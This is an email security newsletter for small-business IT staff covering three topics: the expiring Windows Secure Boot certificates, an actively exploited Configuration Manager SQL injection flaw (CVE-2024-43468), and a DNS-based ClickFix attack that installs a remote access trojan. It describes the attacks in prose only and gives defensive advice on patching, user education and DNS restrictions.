Table of Contents

Windows Secure Boot certificate updates

The big picture: Microsoft is updating the "Secure Boot" certificates that help protect your PC when it first starts up. The original certificates from 2011 will expire in June 2026. Without this update, your computers may be at risk from advanced hackers.

Why it matters: Secure Boot is like a digital bouncer. It ensures only trusted software can run before your Windows operating system loads. If these certificates expire:

  • Security gaps: Your PC won't receive new defenses against "bootkits" or "rootkits."

  • Update failures: Future Windows updates or new hardware might not work correctly.

  • Risk over time: Your devices will enter a "degraded security state," making them easier targets for sophisticated attacks.

The action plan: Most small businesses can handle this easily through regular maintenance.

  • Install Windows updates: Most PCs will get the new certificates automatically through monthly Windows updates.

  • Check firmware: Some devices need a firmware (BIOS) update from the manufacturer (like Dell, HP, or Lenovo) before the Windows update can work.

  • Do not disable Secure Boot to bypass errors; this leaves your network wide open to startup malware.

What stays the same: Your computers will not stop working on the expiration date. They will still boot up, and your apps will run. However, they will lack the latest protection against new threats.

Go deeper: Refreshing the root of trust: industry collaboration on Secure Boot certificate updates | Windows Experience Blog

Old SCCM vulnerability being exploited, says CISA

The big picture: The Cybersecurity and Infrastructure Security Agency (CISA) added this flaw (CVE-2024-43468) to its list of known exploited vulnerabilities. This means attackers are actively using it to break into organizations.

Why it matters: Hackers are now exploiting a critical flaw in Microsoft Configuration Manager (formerly SCCM). If you use this tool to manage your Windows servers and workstations, your entire network could be at risk.

How it works

  • The flaw: It is a "SQL injection" vulnerability.

  • The risk: An attacker does not need a username or password. They can send a special request to your server to run their own commands.

  • The angle: Because Configuration Manager often has high-level access, an attacker could take full control of your servers and databases.

Yes, but: Unless you have your SCCM exposed to the Internet (the answer should be no), the attacker will first need to gain a foothold on your internal network. Still patch immediately, but at least you don’t have to worry about threat actors actively scanning across the Internet.

What you should do

Microsoft originally released a patch for this in October 2024. While they first thought it was "less likely" to be used in attacks, experts later released public code showing exactly how to exploit it.

  1. Check your version: Are you running a vulnerable version of Microsoft Configuration Manager? Hopefully you are patching software regularly and the answer is no.

  2. Update immediately: If you are on a vulnerable version, apply the security updates provided by Microsoft for CVE-2024-43468. (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468)

Go deeper: https://www.cisa.gov/news-events/alerts/2026/02/12/cisa-adds-four-known-exploited-vulnerabilities-catalog

Security Alert: New "ClickFix" attack uses DNS to bypass defenses

The big picture: Hackers are using a new version of the "ClickFix" attack. This time, they trick users into running a simple network command to bypass security tools and install a remote access trojan (RAT).

How it works: ClickFix attacks usually trick people into thinking their computer has an error. The user is told to copy and paste a command to "fix" it.

  • The new twist: Instead of downloading a file from a website, the command runs nslookup.

  • The payload: This command asks a hacker-controlled server for information. The server sends back a malicious PowerShell script hidden inside a DNS response.

  • The result: The script installs "ModeloRAT," which gives hackers full control of the device.

Why it matters: Most security software watches for suspicious web downloads (HTTP). However, many tools do not monitor DNS traffic as closely. By hiding the attack in a DNS lookup, hackers can:

  1. Evade detection: The attack looks like standard network traffic.

  2. Change tactics quickly: Hackers can update the malicious script on their server instantly without changing the link the user clicks.

What you can do: As an IT professional, you are the first line of defense for your team.

  • Educate users: Remind employees that legitimate support (like Microsoft or Google) will never ask them to run commands from a "Run" dialog box or PowerShell to fix a browser error.

  • Restrict permissions: Use the principle of least privilege. If users don’t have local admin rights, many of these scripts will fail to install.

  • Monitor DNS: If possible, use DNS filtering or monitoring tools to look for unusual queries to unknown external IP addresses.

  • Restrict DNS servers: In your local network, you can restrict what DNS servers your clients can connect to. You can also use Windows Firewall and Group Policy Objects (GPOs) to block outgoing TCP/UDP traffic on port 53, except for authorized DNS server IPs.

Go deeper: https://www.bleepingcomputer.com/news/security/new-clickfix-attack-abuses-nslookup-to-retrieve-powershell-payload-via-dns/

If you have any comments or feedback, just respond to this email!

Thanks for reading and stay secure,

Aaron

Keep Reading

© 2026 Sensible Security.
Report abusePrivacy policyTerms of use
beehiivPowered by beehiiv